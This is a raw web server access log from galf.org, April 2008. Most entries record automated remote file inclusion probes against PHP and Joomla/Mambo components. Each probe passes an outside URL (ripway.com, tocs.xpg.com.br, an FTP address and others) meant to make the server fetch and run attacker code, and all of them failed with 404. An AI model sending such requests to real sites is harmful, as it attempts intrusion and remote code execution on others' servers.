200.30.73.117 - - [27/Apr/2008:17:18:09 -0700] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.30.73.117 - - [27/Apr/2008:17:18:09 -0700] "GET /logs//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:18:14 -0700] "GET /logs/access_070924.log/index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:18:14 -0700] "GET /index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:18:14 -0700] "GET /logs/index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:19:11 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:19:12 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:17:19:32 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.251.134 - - [27/Apr/2008:17:19:40 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:20:01 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:20:02 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:20:02 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:20:42 -0700] "GET /logs/access_070903.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.36.177.149 - - [27/Apr/2008:17:21:49 -0700] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.22.90 - - [27/Apr/2008:17:21:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.26 - - [27/Apr/2008:17:21:57 -0700] "GET /logs/access_071231.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.186.1.54 - - [27/Apr/2008:17:22:30 -0700] "GET //components/errors.php?error=http://www.pcpaclass16.com/user/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
89.186.1.54 - - [27/Apr/2008:17:22:31 -0700] "GET /logs//components/errors.php?error=http://www.pcpaclass16.com/user/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
89.186.1.54 - - [27/Apr/2008:17:22:36 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
89.186.1.54 - - [27/Apr/2008:17:22:36 -0700] "GET /logs//components/errors.php?error=http://allblackberry.com/install/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:22:51 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:23:01 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:23:01 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:17:23:08 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.193.54 - - [27/Apr/2008:17:23:08 -0700] "GET /logs/access.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
195.205.214.163 - - [27/Apr/2008:17:23:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:23:14 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:23:14 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:23:15 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:23:46 -0700] "GET /logs/access_071029.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:23:46 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:23:46 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:17:23:59 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:24:11 -0700] "GET /logs/access_071112.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:24:11 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:24:12 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:24:15 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:24:46 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
65.36.177.149 - - [27/Apr/2008:17:24:50 -0700] "GET /logs/access_071008.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:25:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:25:05 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:25:28 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
62.141.56.36 - - [27/Apr/2008:17:26:06 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:26:16 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:26:40 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
87.230.21.32 - - [27/Apr/2008:17:26:53 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
87.230.21.32 - - [27/Apr/2008:17:26:54 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:28:16 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:28:16 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
69.94.32.245 - - [27/Apr/2008:17:28:23 -0700] "GET /logs/access_071008.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:28:28 -0700] "GET /logs/access_080310.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:28:31 -0700] "GET /logs/access_080113.log/index.php3?id=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:28:34 -0700] "GET /index.php3?id=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:28:34 -0700] "GET /logs/index.php3?id=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:29:00 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.243.128.10 - - [27/Apr/2008:17:29:00 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:29:22 -0700] "GET /logs/access_080121.log/nav.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:29:22 -0700] "GET /nav.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:29:22 -0700] "GET /logs/nav.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.72.211.242 - - [27/Apr/2008:17:29:22 -0700] "GET /logs/access_071217.log/nav.php?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.57.64.147 - - [27/Apr/2008:17:29:24 -0700] "GET /logs/access_071119.log/oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.57.64.147 - - [27/Apr/2008:17:29:24 -0700] "GET /logs/oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:30:20 -0700] "GET /logs/access_080317.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:30:20 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:30:20 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.153.63 - - [27/Apr/2008:17:30:37 -0700] "GET /logs/access_071008.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:30:37 -0700] "GET /logs/access_070924.log/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:30:37 -0700] "GET /index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.176 - - [27/Apr/2008:17:30:38 -0700] "GET /logs/index2.php?x=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:30:39 -0700] "GET /logs/access_071231.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:30:39 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:30:39 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:17:30:49 -0700] "GET /logs/access_080317.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:30:50 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
89.108.66.127 - - [27/Apr/2008:17:31:08 -0700] "GET /logs/access_080121.log//guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.127 - - [27/Apr/2008:17:31:08 -0700] "GET //guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.127 - - [27/Apr/2008:17:31:08 -0700] "GET /logs//guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:31:10 -0700] "GET /logs/access_080128.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:31:13 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:31:14 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:31:15 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.249.70.116 - - [27/Apr/2008:17:31:24 -0700] "GET /logs/access_080128.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
72.232.122.239 - - [27/Apr/2008:17:31:49 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
72.232.122.239 - - [27/Apr/2008:17:31:52 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
89.108.66.127 - - [27/Apr/2008:17:31:54 -0700] "GET /logs/access_080324.log//guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.14.221.111 - - [27/Apr/2008:17:31:59 -0700] "GET /index.php?loc=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.1.202.61 - - [27/Apr/2008:17:32:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:32:24 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
83.223.101.14 - - [27/Apr/2008:17:32:24 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
64.179.90.54 - - [27/Apr/2008:17:32:36 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:17:33:04 -0700] "GET /logs/access_070917.log//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:17:33:05 -0700] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.116.91.54 - - [27/Apr/2008:17:33:05 -0700] "GET /logs//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.229.26.205 - - [27/Apr/2008:17:33:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
87.229.26.205 - - [27/Apr/2008:17:33:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:33:23 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:17:33:23 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:33:47 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.215.228.13 - - [27/Apr/2008:17:33:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
213.215.228.13 - - [27/Apr/2008:17:33:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:33:47 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.232.122.239 - - [27/Apr/2008:17:34:11 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
72.232.122.239 - - [27/Apr/2008:17:34:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
77.232.68.17 - - [27/Apr/2008:17:34:22 -0700] "GET /logs/access_071008.log/index2.php?x=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:36:04 -0700] "GET /logs/access_080113.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:36:05 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.194.149.65 - - [27/Apr/2008:17:36:05 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
